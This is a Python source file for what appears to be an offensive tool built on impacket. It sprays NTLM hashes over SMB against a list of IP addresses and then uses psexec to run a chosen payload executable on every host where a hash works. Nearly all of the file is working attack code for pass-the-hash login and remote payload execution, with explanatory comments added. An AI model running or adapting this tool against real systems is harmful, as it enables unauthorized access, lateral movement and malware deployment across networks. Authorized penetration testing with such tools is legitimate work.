#!/usr/bin/python
import psexec
import time
import blessed
import sys
import re
import argparse
import signal
from impacket.smbconnection import *
import multiprocessing
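class timeout:
    """Context manager that aborts the guarded block after ``seconds``.

    Implemented with ``SIGALRM`` and ``signal.alarm`` (whole seconds, Unix
    only, main thread only).  On exit the pending alarm is cancelled and the
    ``SIGALRM`` handler that was installed before ``__enter__`` is put back,
    so nesting a ``timeout`` inside another one (or inside code with its own
    alarm handler) no longer leaves this object's handler installed.

    Args:
        seconds: Whole seconds before the alarm fires (handed to signal.alarm).
        error_message: Text carried by the exception raised on expiry.

    Raises:
        TimeoutError: raised from the signal handler when the alarm fires.
            It is a subclass of ``Exception``, so callers that catch
            ``Exception`` (as this file does) keep working unchanged.
    """

    def __init__(self, seconds, error_message='Timeout'):
        self.seconds = seconds
        self.error_message = error_message
        # Handler that was active before __enter__; restored by __exit__.
        self._previous_handler = None

    def handle_timeout(self, signum, frame):
        """SIGALRM handler: abort the guarded block with ``error_message``."""
        raise TimeoutError(self.error_message)

    def __enter__(self):
        # signal.signal returns the previously installed handler (or None when
        # it was not installed from Python); keep it so __exit__ can restore it.
        self._previous_handler = signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.seconds)
        return self

    def __exit__(self, exc_type, exc_value, exc_tb):
        # Cancel the alarm first so it cannot fire while the handler is swapped.
        signal.alarm(0)
        if self._previous_handler is not None:
            signal.signal(signal.SIGALRM, self._previous_handler)
        # Returning None lets any exception raised in the block propagate.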
# Shared blessed terminal; the functions below use its colour attributes
# (t.bold_green, t.bold_red, t.green, t.normal) to decorate console output.
t = blessed.Terminal()
def StartPsexec(exeFile: str, targetusername: str, psexechash: str, targetdomain: str, psexecip: str) -> None:
    """Run one PSEXEC session against ``psexecip`` using a hash for authentication.

    Started by DoPsexecSpray in a multiprocessing.Process, one per working
    (hash, ip) pair.  Authentication is password-less: ``psexechash`` is passed
    to PSEXEC as ``hashes`` together with ``password=''``; Kerberos and AES are
    disabled.

    Args:
        exeFile: Path handed to PSEXEC as ``exeFile``.
        targetusername: Account name for the login.
        psexechash: Hash string in whatever form ``psexec.PSEXEC`` expects
            for ``hashes`` (the caller passes the raw line from the hash list).
        targetdomain: Domain for the login.
        psexecip: Host passed to ``PSEXEC.run``.

    Returns:
        None.  The outcome is only reported on stdout; any exception other
        than SessionError propagates out of the child process.
    """
    PSEXEC = psexec.PSEXEC(command="", path="", exeFile=exeFile, copyFile="", protocols=None, username=targetusername,
                           hashes=psexechash, domain=targetdomain, password='', aesKey=None, doKerberos=False)
    print(t.bold_green + "\n[*] Starting Psexec...." + t.normal)
    # Fixed 15 s pause before running; the reason is not recorded here --
    # presumably to stagger the child processes the caller starts back to back.
    time.sleep(15)
    try:
        PSEXEC.run(psexecip)
    except SessionError:
        # SessionError is expected to come from the wildcard impacket import.
        # The underlying error is not printed, and the red colour is never
        # reset with t.normal, so it may bleed into later output.
        print(t.bold_red + "[*] Clean Up Failed, Remove Manually with Shell")
def DoPsexecSpray(exeFile: str, hashfile: str = "", ipfile: str = "", username: str = "", domain: str = "") -> None:
    """Try every hash against every IP over SMB, then optionally run PSEXEC.

    Inputs left empty are requested interactively with ``input``.  For each
    (ip, hash) pair a fresh SMBConnection to port 445 is opened and one login
    attempt is made with ``password=''`` and the LM/NT halves of the hash.
    Successful pairs are collected in ``workinghashes`` as ``"<hash>,<ip>"``
    and, after confirmation, each one is handed to StartPsexec in its own
    multiprocessing.Process.

    Args:
        exeFile: Payload path forwarded unchanged to StartPsexec.
        hashfile: Optional file with one ``lm:nt`` hash per line.
        ipfile: Optional file with one IP per line.
        username: Account name; prompted for when empty.
        domain: Domain name; prompted for when empty.

    Returns:
        None.  Results are reported on stdout only.

    Raises:
        ValueError: escapes the loop when a hash line does not contain
            exactly one ``:`` (for example a blank line in ``hashfile``),
            because the unpacking below is not guarded.
    """
    targetsprayhash = []
    targetipseperated = []
    workinghashes = []
    print(t.bold_green + "[*] Chosen Payload: " + t.normal + exeFile)
    if not hashfile:
        targethash = input("[*] Enter Hashes Seperated by Comma: ")
        targetsprayhash = targethash.split(",")
    else:
        print(t.bold_green + "[*] Hash File Selected: " + t.normal + hashfile)
        # The handle is never closed and the name is reused for the IP file
        # below.  Only "\n" is stripped, so a CRLF file leaves a trailing "\r"
        # on the NT half of every hash.
        file = open(hashfile, "r")
        for hash in file:
            targetsprayhash.append(hash.strip("\n"))
    if not ipfile:
        targetips = input("[*] Enter IP's Serperated by Comma:")
        targetipseperated = targetips.split(',')
    else:
        print(t.bold_green + "[*] IP File Selected: " + t.normal + ipfile)
        file = open(ipfile, "r")
        for ip in file:
            targetipseperated.append(ip.strip("\n"))
    if not username:
        targetusername = input("[*] Enter Username: ")
    else:
        targetusername = username
    if not domain:
        targetdomain = input("[*] Enter Domain: ")
    else:
        targetdomain = domain
    for ip in targetipseperated:
        for hash in targetsprayhash:
            # Split order is LM first, NT second, i.e. the expected input
            # format is "lm:nt"; the label printed on the next line says
            # "NT:LM", which contradicts that -- presumably a typo in the
            # label rather than in the split, confirm against the hash source.
            targetlm, targetnt = hash.split(':')
            print(t.green + "[*] NT:LM Hash: " + t.normal + hash.strip(' ') + "," + ip)
            try:
                # The 8 s limit covers only the connection setup; smb.login
                # below runs without a time limit.
                with timeout(8):
                    smb = SMBConnection(ip, ip, sess_port=445)
            except Exception as E:
                # Any failure here (not only the alarm) is reported as a timeout.
                print(t.bold_red + "[!!] Timed Out!" + t.normal)
                print(E)
                continue
            try:
                smb.login(user=targetusername, password='',
                          domain=targetdomain, lmhash=targetlm, nthash=targetnt)
                print(t.bold_green + "[!] This Hash Worked - " + smb.getServerName() + t.normal)
                # Stored unstripped, joined with "," so StartPsexec can split
                # it again; the connection itself is never logged off or closed.
                workinghashes.append(hash + "," + ip)
            except Exception as E:
                # Every error, including non-authentication ones, is reported
                # as a failed hash; failures are printed but not recorded.
                print(t.bold_red + "[!] This Hash Failed" + t.normal)
                print(E)
    if workinghashes:
        print(t.green + "\n[*] Working Hashes:")
        for hash in workinghashes:
            print(t.bold_green + hash + t.normal)
        want_to_psexec = input("[*] Run Psexec on Working Hashes? [Y/n]: ")
        # Plain Enter counts as "yes".
        if want_to_psexec.lower() == "y" or want_to_psexec == "":
            for hash in workinghashes:
                psexechash, psexecip = hash.split(",")
                b = multiprocessing.Process(
                    target=StartPsexec, args=(exeFile, targetusername, psexechash, targetdomain, psexecip))
                # __name__ here is this module's name: children are
                # non-daemon when the script is run directly and daemon
                # (terminated with the parent) when called from an importer.
                if __name__ == "__main__":
                    b.daemon = False
                else:
                    b.daemon = True
                b.start()
    else:
        print(t.bold_red + "[!] No Working Hashes. Exiting..." + t.normal)
if __name__ == "__main__":
    # Command-line front end.  Every optional flag defaults to "" so that
    # DoPsexecSpray falls back to an interactive prompt for it.
    parser = argparse.ArgumentParser(description='Spray Smb Hashes and Psexec')
    optional_flags = (
        ("-hashfile", "Parse Hashes from a File (Hashes Seperated by New Line)"),
        ("-ipfile", "Parse IP's from a File (IP's Seperated by New Line)"),
        ("-username", "Set Username"),
        ("-domain", "Set Domain"),
    )
    for flag, help_text in optional_flags:
        parser.add_argument(flag, help=help_text, default="")
    parser.add_argument("payloadpath", help="Select Payload for Psexec")
    args = parser.parse_args()
    DoPsexecSpray(
        args.payloadpath,
        args.hashfile,
        args.ipfile,
        args.username,
        args.domain,
    )